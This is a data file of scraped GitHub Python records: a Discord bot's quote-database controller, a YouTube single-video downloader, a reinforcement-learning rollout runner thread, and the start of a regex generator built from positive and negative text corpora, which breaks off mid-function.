+{"seq_id": "30724153739", "text": "import logging\nfrom datetime import datetime\nfrom typing import List, Union\n\nimport discord\nfrom sqlalchemy import orm\n\n# noinspection PyUnresolvedReferences\nfrom kaztron.driver import database as db\nfrom kaztron.cog.quotedb.model import *\nfrom kaztron.driver.database import make_error_handler_decorator, func\nfrom kaztron.utils.discord import extract_user_id\n\nlogger = logging.getLogger(__name__)\n\ndb_file = 'quotedb.sqlite'\n\nengine = None\nSession = db.sessionmaker()\nsession = None\n\n\nclass UserNotFound(RuntimeError):\n pass\n\n\ndef init_db():\n global engine, session\n engine = db.make_sqlite_engine(db_file)\n Session.configure(bind=engine)\n session = Session()\n Base.metadata.create_all(engine)\n\n\non_error_rollback = make_error_handler_decorator(lambda *args, **kwargs: session, logger)\n\n\ndef query_user(server: discord.Server, id_: str):\n \"\"\"\n Find a user given an ID string passed by command, or create it if it does not exist.\n\n id_ can be passed to a command as a discord mention ``<@123456789012345678>`` or\n ``<@!123456789012345678>``, or as a Discord ID ``123456789012345678`` (various malformed\n inputs may also be accepted, e.g., ``@123456789012345678``).\n\n For Discord Mention or Discord ID, if the user is not found but exists on Discord, a new\n entry is created. In other cases, a :cls:`~.UserNotFound` error is raised.\n\n :raises UserNotFound: User was not found. Either the Discord user exists neither on Discord\n nor in the database, or a database ID was passed and could not be found.\n :raises discord.HTTPException: Discord API error occurred\n :raises db.exc.MultipleResultsFound: Should never happen - database is buggered.\n \"\"\"\n\n # Parse the passed ID\n try:\n discord_id = extract_user_id(id_)\n except discord.InvalidArgument:\n raise ValueError('Invalid Discord user ID format')\n logger.debug('query_user: passed Discord ID: {}'.format(discord_id))\n\n # Check if user exists\n try:\n db_user = session.query(User).filter_by(discord_id=discord_id).one()\n except db.orm_exc.MultipleResultsFound:\n logger.exception(\"Er, mate, I think we've got a problem here. 
\"\n \"The database is buggered.\")\n raise\n except db.orm_exc.NoResultFound:\n logger.debug('query_user: user not found, creating user')\n member = server.get_member(discord_id) # type: discord.Member\n if member is None:\n raise UserNotFound('Discord user not found')\n db_user = create_user(member)\n logger.debug('query_user: created user: {!r}'.format(db_user))\n else:\n logger.debug('query_user: found user: {!r}'.format(db_user))\n\n member = server.get_member(discord_id) # type: discord.Member\n if member:\n update_nicknames(db_user, member)\n else:\n logger.warning(\"Can't find user {!r} on Discord, skipping update nicknames\"\n .format(db_user))\n\n return db_user\n\n\n@on_error_rollback\ndef create_user(member: discord.Member) -> User:\n db_user = User(\n discord_id=member.id,\n name=member.nick if member.nick else member.name,\n username=member.name\n )\n session.add(db_user)\n session.commit()\n return db_user\n\n\ndef search_users(query: str) -> List[User]:\n \"\"\"\n Search for users.\n :param query: The substring to search for.\n :return:\n \"\"\"\n search_term_like = '%{}%'.format(query.replace('%', '\\\\%').replace('_', '\\\\_'))\n # noinspection PyUnresolvedReferences\n results = session.query(User) \\\n .filter(db.or_(User.name.ilike(search_term_like, escape='\\\\'),\n User.username.ilike(search_term_like, escape='\\\\'))) \\\n .order_by(User.name) \\\n .all()\n try:\n results[0]\n except IndexError:\n raise UserNotFound\n logger.info(\"search_users: Found {:d} results for {!r}\".format(len(results), query))\n return results\n\n\ndef random_quote() -> Quote:\n return session.query(Quote).order_by(func.random()).limit(1).one()\n\n\ndef get_total_quotes() -> int:\n return session.query(Quote).count()\n\n\ndef get_total_quoted_users() -> int:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User).join(User.quotes).having(total > 0).group_by(User.user_id).count()\n\n\ndef get_top_quoted(num: int=3) -> List[Quote]:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User, total).join(User.quotes) \\\n .group_by(Quote.author_id).order_by(db.desc(total)).limit(num).all()\n\n\ndef get_top_saved(num: int=3) -> List[Quote]:\n total = db.func.count(Quote.quote_id).label('total')\n return session.query(User, total).join(User.saved_quotes) \\\n .group_by(Quote.saved_by_id).order_by(db.desc(total)).limit(num).all()\n\n\ndef search_quotes(search_term: str=None, user: Union[User, List[User]]=None) -> List[Quote]:\n \"\"\"\n Fulltext search for quotes.\n :param search_term: The substring to search for.\n :param user: optional user to filter by\n \"\"\"\n\n if not user and not search_term:\n raise ValueError(\"Must specify at least 1 search criterion\")\n\n if user:\n user_list = [user] if isinstance(user, User) else user # type: List[User]\n else:\n user_list = []\n\n query = session.query(Quote)\n if user_list:\n # noinspection PyUnresolvedReferences\n query = query.filter(Quote.author_id.in_(u.user_id for u in user_list))\n\n if search_term:\n search_term_like = db.format_like(search_term)\n # noinspection PyUnresolvedReferences\n query = query.filter(Quote.message.ilike(search_term_like, escape='\\\\'))\n\n results = query.order_by(Quote.timestamp).all()\n try:\n results[0]\n except IndexError:\n raise orm.exc.NoResultFound\n logger.info(\"search_quotes: Found {:d} results for search_term={}, user_list={}\"\n .format(len(results), search_term, ','.join(u.name for u in user_list)))\n return results\n\n\n@on_error_rollback\ndef 
store_quote(\n user: User,\n saved_by: User,\n channel_id: str,\n message: str,\n timestamp: datetime=None):\n \"\"\"\n Store a new quote.\n :param user: Author of the note.\n :param saved_by: User who initiated storage of this note.\n :param channel_id: Channel in which the quote was said.\n :param message: User's message to retain as a quote.\n :param timestamp: Time at which quote was said (or stored, if unavailable).\n :return:\n \"\"\"\n if timestamp is None:\n timestamp = datetime.utcnow()\n\n logger.info(\"Inserting quote by {}...\".format(user))\n logger.debug(\"store_quote: user={!s} saved_by={!s} timestamp={} message={!r}\"\n .format(user, saved_by, timestamp.isoformat(' '), message))\n quote = Quote(\n timestamp=timestamp, author=user, saved_by=saved_by, channel_id=channel_id, message=message\n )\n session.add(quote)\n session.commit()\n return quote\n\n\n@on_error_rollback\ndef update_nicknames(user: User, member: discord.Member):\n \"\"\"\n Update a user's nicknames and usernames.\n \"\"\"\n logger.debug(\"update_nicknames: Updating names: {!r}...\".format(user))\n user.name = member.nick if member.nick else member.name\n user.username = member.name\n session.commit()\n logger.info(\"update_nicknames: Updated names: {!r}\".format(user))\n\n\n@on_error_rollback\ndef remove_quotes(quotes: List[Quote]):\n \"\"\"\n Delete a quote object from the database.\n \"\"\"\n for quote in quotes:\n logger.info(\"remove_quotes: Deleting quote {!r}...\".format(quote))\n session.delete(quote)\n session.commit()\n", "repo_name": "Worldbuilding/kaztron", "sub_path": "kaztron/cog/quotedb/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 7635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "kaztron.driver.database.sessionmaker", "line_number": 19, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 19, "usage_type": "name"}, {"api_name": "kaztron.driver.database.make_sqlite_engine", "line_number": 29, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 29, "usage_type": "name"}, {"api_name": "kaztron.driver.database.make_error_handler_decorator", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.Server", "line_number": 38, "usage_type": "attribute"}, {"api_name": "kaztron.utils.discord.extract_user_id", "line_number": 57, "usage_type": "call"}, {"api_name": "discord.InvalidArgument", "line_number": 58, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database.orm_exc", "line_number": 65, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 65, "usage_type": "name"}, {"api_name": "kaztron.driver.database.orm_exc", "line_number": 69, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 69, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 90, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database.or_", "line_number": 110, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 110, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 101, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.random", "line_number": 123, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 123, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 131, 
"usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 131, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 131, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 136, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 136, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 136, "usage_type": "name"}, {"api_name": "kaztron.driver.database.desc", "line_number": 138, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 135, "usage_type": "name"}, {"api_name": "kaztron.driver.database.func.count", "line_number": 142, "usage_type": "call"}, {"api_name": "kaztron.driver.database.func", "line_number": 142, "usage_type": "attribute"}, {"api_name": "kaztron.driver.database", "line_number": 142, "usage_type": "name"}, {"api_name": "kaztron.driver.database.desc", "line_number": 144, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 147, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 147, "usage_type": "name"}, {"api_name": "kaztron.driver.database.format_like", "line_number": 168, "usage_type": "call"}, {"api_name": "kaztron.driver.database", "line_number": 168, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.exc", "line_number": 176, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm", "line_number": 176, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 188, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 199, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 199, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 213, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 225, "usage_type": "name"}]}
+{"seq_id": "71197424487", "text": "from pytube import YouTube\nimport os\nimport asyncio\n\n# link = \"https://youtu.be/EAYlckSaviI\"\nlink = input(\"Enter the link for the Youtube video to download: \")\n\ndownloadThisResolution = None\n\nyt = YouTube(link)\n\n# Create a folder with the name of playlist and execute the download code after navigating to the new Directory\ncurrentDir = os.getcwd()\n# print(currentDir)\nif(os.path.exists(f\"{currentDir}\\{yt.title}\")):\n print(f\"Folder {yt.title} already exists\")\n print(f\"Folder changed to {yt.title}\")\n os.chdir(yt.title) #Change directory\nelse: \n os.mkdir(yt.title) \t#Make directory\n os.chdir(yt.title)\n print(f\"Folder {yt.title} created\")\n print(f\"Folder changed to {yt.title}\")\n# print(os.getcwd())\n\nprint(f\"Downloading video: {yt.title}\")\n\n# get all the available resolutions of a video\npixels = yt.streams\navailableResolutions = list(enumerate(pixels))\nfor pix in availableResolutions:\n # print(pix)\n checkRes = str(pix[1])\n # print(checkRes)\n if(len(checkRes.split(\"720p\"))>1 and len(checkRes.split(\"video/mp4\"))>1 and len(checkRes.split(\"progressive=\\\"True\\\"\"))>1):\n print(pix[0])\n downloadThisResolution = pix[0]\n\n# print()\n# print(downloadThisResolution)\nasyncio.wait_for(pixels[downloadThisResolution].download())\nprint(f\"Video {yt.title} downloaded successfully!\")", "repo_name": "ManthanDhole/Youtube-Download-UtilityCode", "sub_path": "Single_YoutubeVideo_Downloader.py", "file_name": "Single_YoutubeVideo_Downloader.py", "file_ext": "py", "file_size_in_byte": 1331, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytube.YouTube", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 20, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 21, "usage_type": "call"}, {"api_name": "asyncio.wait_for", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "10306042367", "text": "from helpers import PartialRollout\nimport threading\nimport six.moves.queue as queue\nimport tensorflow as tf\nimport pdb\nfrom collections import deque\nfrom demonstration_manager import DemonstrationManager\nimport numpy as np\n\nclass RunnerThread(threading.Thread):\n \"\"\"\nOne of the key distinctions between a normal environment and a universe environment\nis that a universe environment is _real time_. This means that there should be a thread\nthat would constantly interact with the environment and tell it what to do. This thread is here.\n\"\"\"\n def __init__(self, env, policy, num_local_steps, visualise, reward_f = None,record = False,shared=False,enemy = False):\n threading.Thread.__init__(self)\n self.record = record\n self.queue = queue.Queue(5)\n self.num_local_steps = num_local_steps\n self.env = env\n self.last_features = None\n self.policy = policy\n self.daemon = True\n self.sess = None\n self.shared=shared\n self.same_colours = enemy\n\n self.summary_writer = None\n self.visualise = visualise\n self.reward_f = reward_f\n\n def start_runner(self, sess, summary_writer):\n self.sess = sess\n self.summary_writer = summary_writer\n self.start()\n\n def run(self):\n with self.sess.as_default():\n self._run()\n\n def _run(self):\n if self.record:\n rollout_provider = recording_runner(self.env, self.policy, self.num_local_steps, self.summary_writer,\n self.visualise)\n else:\n #rollout_provider = conv_runner(self.env, self.policy, self.num_local_steps, self.summary_writer, self.visualise,reward_f=self.reward_f,shared=self.shared)\n rollout_provider = self.runner()\n while True:\n # the timeout variable exists because apparently, if one worker dies, the other workers\n # won't die with it, unless the timeout is set to some large number. This is an empirical\n # observation.\n\n self.queue.put(next(rollout_provider), timeout=600.0)\n\n\n def runner(self):\n\n \"\"\"\n The logic of the thread runner. In brief, it constantly keeps on running\n the policy, and as long as the rollout exceeds a certain length, the thread\n runner appends the policy to the queue.\n \"\"\"\n\n # ok so theres a bunch of options here. Theres a record mode. 
a convolution or lstm option for both policy and reward function\n # skip the recording part for now such that the two run similarly.\n ## Define here the configuration of the whole thing.\n\n external_reward = self.reward_f is not None\n shared = hasattr(self.policy,\"shared\")\n policy_type = self.policy.type\n reward_type = self.reward_f.type if external_reward else None\n\n last_state = self.env.reset()\n last_features = self.policy.get_initial_features() if self.policy.type =='lstm' else [None]\n\n if external_reward:\n if shared is False and reward_type=='lstm':\n r_features = self.reward_f.get_initial_features()\n elif shared is True and reward_type=='lstm':\n last_features,r_features = self.policy.get_initial_features()\n else:\n r_features =[None]\n\n if reward_type == 'conv':\n r_mem_size = self.reward_f.mem_size\n r_obs = np.zeros(self.reward_f.ob_space[:-1] + (r_mem_size,))\n else:\n r_obs = last_state\n irl_rewards = []\n\n if policy_type == 'conv':\n p_mem_size = self.policy.mem_size\n p_obs = np.zeros(self.policy.ob_space[:-1] + (p_mem_size,))\n else:\n p_obs = last_state\n\n\n length = 0\n rewards = 0\n\n while True:\n terminal_end = False\n rollout = PartialRollout()\n for _ in range(self.num_local_steps):\n\n if policy_type=='conv':\n p_obs[:, :, :p_mem_size - 1] = p_obs[:, :, 1:p_mem_size]\n p_obs[:, :, -1] = last_state[:, :, 0]\n elif policy_type=='lstm':\n p_obs = last_state\n fetched = self.policy.act([p_obs], *last_features)\n action, value_, = fetched[0], fetched[1]\n features = fetched[2:] if policy_type =='lstm' else [None]\n\n # argmax to convert from one-hot\n state, reward, terminal, info = self.env.step(action.argmax())\n if self.same_colours:\n wh = np.where(state > np.amin(state))\n state[wh[0], wh[1]] = 0.6\n actual_reward = reward\n if self.visualise:\n self.env.render()\n\n if external_reward:\n # If there is an external reward function use that.\n if reward_type == 'conv':\n r_obs[:, :, :r_mem_size - 1] = r_obs[:, :, 1:r_mem_size]\n r_obs[:, :, -1] = last_state[:, :, 0]\n else:\n r_obs = last_state\n\n r_fetched = self.reward_f.reward([r_obs],[action*(1-self.same_colours)])\n #reward = r_fetched[0][0,0] #-r_fetched[0][0,1] #if reward is binary class.\n reward = r_fetched[0][0]\n irl_rewards.append(reward)\n r_features = r_fetched[2] if reward_type == 'lstm' else [None]\n rollout.add(last_state, action, reward, value_, terminal, last_features,r_features)\n else:\n rollout.add(last_state, action, reward, value_, terminal, last_features)\n\n # collect the experience\n\n length += 1\n rewards += actual_reward\n\n last_state = state\n last_features = features\n\n if info:\n summary = tf.Summary()\n for k, v in info.items():\n summary.value.add(tag=k, simple_value=float(v))\n if self.reward_f is not None:\n summary.value.add(tag=\"global/discriminator_reward\", simple_value=float(reward))\n summary.value.add(tag=\"global/discriminator_reward_variance\", simple_value=np.var(irl_rewards))\n self.summary_writer.add_summary(summary, self.policy.global_step.eval())\n self.summary_writer.flush()\n\n timestep_limit = self.env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n if terminal or length >= timestep_limit:\n terminal_end = True\n if length >= timestep_limit or not self.env.metadata.get('semantics.autoreset'):\n last_state = self.env.reset()\n last_features = self.policy.get_initial_features() if self.policy.type == 'lstm' else [None]\n if policy_type == 'conv':\n p_obs = np.zeros(self.policy.ob_space[:-1] + (p_mem_size,))\n if external_reward:\n 
if shared is False and reward_type == 'lstm':\n r_features = self.reward_f.get_initial_features()\n elif shared is True and reward_type == 'lstm':\n last_features, r_features = self.policy.get_initial_features()\n else:\n r_features = [None]\n if reward_type == 'conv':\n r_mem_size = self.reward_f.mem_size\n r_obs = np.zeros(self.reward_f.ob_space[:-1] + (r_mem_size,))\n else:\n r_obs = last_state\n print(\"Episode finished. Sum of rewards: %d. Length: %d\" % (rewards, length))\n #with tf.device(tf.train.replica_device_setter(1)):\n if external_reward:\n print(\"IRL REWARDS: {}. Average: {}\".format(np.sum(irl_rewards),np.mean(irl_rewards)))\n if len(irl_rewards) > 0:\n print(\"Max reward {}\".format(np.amax(irl_rewards)))\n irl_rewards=[]\n\n length = 0\n rewards = 0\n\n break\n\n if not terminal_end:\n rollout.r = self.policy.value([p_obs], *last_features)\n\n # once we have enough experience, yield it, and have the ThreadRunner place it on a queue\n yield rollout\n\n\ndef recording_runner(env, policy, num_local_steps, summary_writer, render):\n \"\"\"\n A thread runner that records the best and worse trajectories of the thread\n \"\"\"\n recorder = DemonstrationManager(\"../data/pong/demonstrations\")\n recorder_failure = DemonstrationManager(\"../data/pong/demonstrations_failure\")\n last_state = env.reset()\n last_features = policy.get_initial_features()\n length = 0\n rewards = 0\n demonstration = PartialRollout()\n while True:\n terminal_end = False\n rollout = PartialRollout()\n for _ in range(num_local_steps):\n fetched = policy.act([last_state], *last_features)\n action, value_, features = fetched[0], fetched[1], fetched[2:]\n\n\n # argmax to convert from one-hot\n state, reward, terminal, info = env.step(action.argmax())\n if render:\n env.render()\n\n rollout.add(last_state, action, reward, value_, terminal, last_features)\n\n demonstration.add(last_state, action, reward, value_, terminal, last_features)\n\n length += 1\n rewards += reward\n\n last_state = state\n last_features = features\n\n if info:\n summary = tf.Summary()\n for k, v in info.items():\n summary.value.add(tag=k, simple_value=float(v))\n summary_writer.add_summary(summary, policy.global_step.eval())\n summary_writer.flush()\n\n timestep_limit = env.spec.tags.get('wrapper_config.TimeLimit.max_episode_steps')\n if terminal or length >= timestep_limit:\n terminal_end = True\n if length >= timestep_limit or not env.metadata.get('semantics.autoreset'):\n last_state = env.reset()\n last_features = policy.get_initial_features()\n print(\"Episode finished. Sum of rewards: %d. 
Length: %d\" % (rewards, length))\n recorder.append_to_best(demonstration)\n recorder_failure.append_to_worst(demonstration)\n demonstration = PartialRollout()\n length = 0\n rewards = 0\n break\n\n if not terminal_end:\n rollout.r = policy.value([last_state], *last_features)\n\n # once we have enough experience, yield it, and have the ThreadRunner place it on a queue\n yield rollout", "repo_name": "KyriacosShiarli/gailf", "sub_path": "src/runner.py", "file_name": "runner.py", "file_ext": "py", "file_size_in_byte": 11073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "threading.Thread", "line_number": 10, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 17, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 17, "usage_type": "attribute"}, {"api_name": "six.moves.queue.Queue", "line_number": 19, "usage_type": "call"}, {"api_name": "six.moves.queue", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.Summary", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 185, "usage_type": "call"}, {"api_name": "demonstration_manager.DemonstrationManager", "line_number": 204, "usage_type": "call"}, {"api_name": "demonstration_manager.DemonstrationManager", "line_number": 205, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 210, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.Summary", "line_number": 235, "usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 250, "usage_type": "call"}]}
+{"seq_id": "36623302224", "text": "import re\r\nimport hashlib\r\nimport io\r\nimport argparse\r\nfrom math import log\r\nfrom math import ceil\r\nfrom os import listdir\r\nfrom os.path import isfile, isdir, join\r\n\r\n\r\n\r\nclass RegexReport:\r\n def __init__(self):\r\n #Key is scope number, value is array of regex in that scope\r\n self.regStr = {}\r\n #Each element is line of text in the detailed report\r\n self.reportText = []\r\n\r\n\r\nclass Corpus:\r\n def __init__(self, window):\r\n self.corpusFiles = {}\r\n self.corpusTerms = {}\r\n self.window = window\r\n self.regStrList = []\r\n self.corpusNegFiles = {}\r\n self.corpusNegTerms = {}\r\n \r\n\r\n def Update(self):\r\n self.UpdatePos()\r\n self.UpdateNeg()\r\n \r\n def UpdatePos(self):\r\n self.corpusTerms = {}\r\n for file in list(self.corpusFiles):\r\n for x in list(self.corpusFiles[file].terms):\r\n if( self.corpusFiles[file].terms[x].Value not in self.corpusTerms ):\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value] = Term( self.corpusFiles[file].terms[x].Value )\r\n else:\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value].Count = 1 + self.corpusTerms[self.corpusFiles[file].terms[x].Value].Count\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value].Neighbors = self.corpusFiles[file].terms[x].Neighbors + self.corpusTerms[self.corpusFiles[file].terms[x].Value].Neighbors\r\n \r\n def UpdateNeg(self):\r\n self.corpusNegTerms = {}\r\n for file in list(self.corpusNegFiles):\r\n for x in list(self.corpusNegFiles[file].terms):\r\n if( self.corpusNegFiles[file].terms[x].Value not in self.corpusNegTerms ):\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value] = Term( self.corpusNegFiles[file].terms[x].Value )\r\n else:\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Count = 1 + self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Count\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Neighbors = self.corpusNegFiles[file].terms[x].Neighbors + self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Neighbors\r\n\r\n def AddPosFile(self, fullName):\r\n f = open(fullName, \"br\")\r\n binary = f.read()\r\n sha256 = hashlib.sha256(binary).hexdigest()\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n NewTermsList = f.read()\r\n CurFile = File(sha256,fullName)\r\n\r\n num = 0\r\n while ( num < ( len(NewTermsList) - 1) ):\r\n if( NewTermsList[num] not in CurFile.terms ):\r\n NewTerm = Term( NewTermsList[num] )\r\n CurFile.terms[NewTermsList[num]] = NewTerm\r\n else:\r\n CurFile.terms[NewTermsList[num]].Count = 1 + CurFile.terms[NewTermsList[num]].Count\r\n\r\n\r\n #get neighbor words, before and after if applicapble\r\n prevNum = num - self.window\r\n nextNum = num + self.window\r\n while( prevNum < num):\r\n if( prevNum > 0 ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[prevNum]), '04x')) +\"}\"\r\n position = prevNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[prevNum],position,UniHex))\r\n prevNum = prevNum + 1\r\n while( nextNum > num ):\r\n if( nextNum < ( len(NewTermsList) - 1) ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[nextNum]), '04x')) +\"}\"\r\n position = nextNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[nextNum],position,UniHex))\r\n nextNum = nextNum - 1\r\n\r\n num = num + 1\r\n\r\n 
self.corpusFiles[CurFile.sha256] = CurFile\r\n f.close()\r\n NewTermsList = \"\"\r\n\r\n def AddNegFile(self, fullName):\r\n f = open(fullName, \"br\")\r\n binary = f.read()\r\n sha256 = hashlib.sha256(binary).hexdigest()\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n NewTermsList = f.read()\r\n CurFile = File(sha256,fullName)\r\n\r\n num = 0\r\n while ( num < ( len(NewTermsList) - 1) ):\r\n if( NewTermsList[num] not in CurFile.terms ):\r\n NewTerm = Term( NewTermsList[num] )\r\n CurFile.terms[NewTermsList[num]] = NewTerm\r\n else:\r\n CurFile.terms[NewTermsList[num]].Count = 1 + CurFile.terms[NewTermsList[num]].Count\r\n\r\n\r\n #get neighbor words, before and after if applicapble\r\n prevNum = num - self.window\r\n nextNum = num + self.window\r\n while( prevNum < num):\r\n if( prevNum > 0 ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[prevNum]), '04x')) +\"}\"\r\n position = prevNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[prevNum],position,UniHex))\r\n prevNum = prevNum + 1\r\n while( nextNum > num ):\r\n if( nextNum < ( len(NewTermsList) - 1) ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[nextNum]), '04x')) +\"}\"\r\n position = nextNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[nextNum],position,UniHex))\r\n nextNum = nextNum - 1\r\n\r\n num = num + 1\r\n\r\n self.corpusNegFiles[CurFile.sha256] = CurFile\r\n f.close()\r\n NewTermsList = \"\"\r\n\r\n def GenerateRegStrList(self):\r\n NegativeTerms = list(self.corpusNegTerms)\r\n for x in list(self.corpusTerms): \r\n posSet = [None for x in range((self.window * 2 ) + 1) ]\r\n negSet = [None for x in range((self.window * 2 ) + 1) ]\r\n regexStr = \"\"\r\n num = -1 * self.window\r\n order = []\r\n if x in NegativeTerms:\r\n #Add the anchor value to the array\r\n negSet[0] = {\"\\\\\" + self.corpusNegTerms[x].UniHex: (self.corpusNegTerms[x].Value,0,\"\\\\\" + self.corpusNegTerms[x].UniHex)}\r\n for y in self.corpusNegTerms[x].Neighbors:\r\n if( negSet[y[1]] == None ):\r\n newDict = {}\r\n newDict[y[2]] = 1\r\n negSet[y[1]] = newDict\r\n else:\r\n if y[2] not in list(negSet[y[1]]):\r\n negSet[y[1]][y[2]] = 1\r\n else:\r\n negSet[y[1]][y[2]] = negSet[y[1]][y[2]] + 1 \r\n \r\n #Add the key value to the array\r\n posSet[0] = {self.corpusTerms[x].UniHex: (self.corpusTerms[x].Value,0,self.corpusTerms[x].UniHex)}\r\n for y in self.corpusTerms[x].Neighbors:\r\n if( posSet[y[1]] == None ):\r\n newDict = {}\r\n newDict[y[2]] = 1\r\n posSet[y[1]] = newDict\r\n else:\r\n if y[2] not in list(posSet[y[1]]):\r\n posSet[y[1]][y[2]] = 1\r\n else:\r\n posSet[y[1]][y[2]] = posSet[y[1]][y[2]] + 1\r\n \r\n while num <= self.window:\r\n order.append( num)\r\n num = num + 1\r\n badRegexStr = False\r\n for index in order:\r\n if posSet[index] != None:\r\n sortedkeys = sorted(posSet[index], key=posSet[index].get, reverse=True) \r\n regexStr = regexStr + \"[\"\r\n charAdded = 0\r\n if index != 0:\r\n for x in sortedkeys:\r\n if negSet[index] != None and x not in list(negSet[index]):\r\n regexStr = regexStr + x\r\n charAdded = charAdded + 1\r\n elif negSet[index] == None or negSet[index][x] == None: \r\n regexStr = regexStr + x\r\n charAdded = charAdded + 1\r\n else:\r\n pass\r\n if charAdded == 0:\r\n badRegexStr = True\r\n regexStr = regexStr + \"]\"\r\n else:\r\n regexStr = regexStr + list(posSet[index])[0]\r\n 
